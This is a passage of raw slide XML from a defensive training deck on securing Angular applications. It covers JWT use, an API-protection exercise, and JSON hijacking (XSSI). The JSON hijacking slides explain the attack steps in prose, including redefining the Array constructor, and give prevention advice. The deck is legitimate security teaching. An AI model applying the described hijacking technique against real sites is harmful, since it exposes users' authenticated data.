              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Information </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>can be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>verified</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>trusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> because it is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>digitally signed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Used in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> parameter, or an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>HTTP header</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Used to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>authenticate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179512" y="195486"/>
            <a:ext cx="6768752" cy="567000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Secure your Angular Application</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JSON Web Token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37868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915566"/>
            <a:ext cx="8856984" cy="3024336"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PW </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>– API-Protection (2/2)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>Exercises</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0" smtClean="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0" smtClean="0"/>
              <a:t>	Follow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" i="1" dirty="0" err="1" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>practical_works</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" i="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>/PW-API-Protection_part_2.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0" smtClean="0"/>
              <a:t> instructions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1092044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1851670"/>
            <a:ext cx="6696744" cy="1102519"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JSON Hijacking </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(XSSI)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38052964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DAF489CC-3B7A-4DA5-A8C0-4984788D0EC5}" type="slidenum">
              <a:rPr lang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>62</a:t>
            </a:fld>
            <a:endParaRPr lang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du contenu 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251520" y="937840"/>
            <a:ext cx="8640960" cy="3506118"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Overview</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>JSON vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> allows third party website to turn your JSON resource URL into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>JSONP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> request under some </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>conditions.</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Exposed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>when a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>GET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>request is made to retrieve JSON information as an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>array. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>ombined</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
              <a:t> to an CSRF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>How </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>does</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>work</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t> ?</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Cross-domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>HTTP requests is possible via the '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>' attribute of '&lt;SCRIPT&gt;' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>tag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>browser sends your credential </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>automatically</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Returning </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>a JSON array is valid as the source for a JavaScript '&lt;SCRIPT&gt;' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>tag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>allows us to redefine the Array constructor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179512" y="195486"/>
            <a:ext cx="6840760" cy="567000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Secure your Angular Application</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>				</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>               </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JSON hijacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="102389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DAF489CC-3B7A-4DA5-A8C0-4984788D0EC5}" type="slidenum">
              <a:rPr lang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>63</a:t>
            </a:fld>
            <a:endParaRPr lang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du contenu 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251520" y="937840"/>
            <a:ext cx="8640960" cy="3506118"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Sample</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t> of the exploit</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179512" y="195486"/>
            <a:ext cx="6653048" cy="567000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Secure your Angular Application</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>				</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JSON </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hijacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0"/>
            </a:b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91630"/>
            <a:ext cx="7124700" cy="2876550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31707588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DAF489CC-3B7A-4DA5-A8C0-4984788D0EC5}" type="slidenum">
              <a:rPr lang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>64</a:t>
            </a:fld>
            <a:endParaRPr lang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du contenu 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251520" y="937840"/>
            <a:ext cx="8640960" cy="3506118"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>Prevent the vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>JSON response by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>POST requests only.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Don’t return an array or prefix your JSON response</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179512" y="195486"/>
            <a:ext cx="6653048" cy="567000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Secure your Angular Application</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>	        		         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JSON </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hijacking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Prote</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
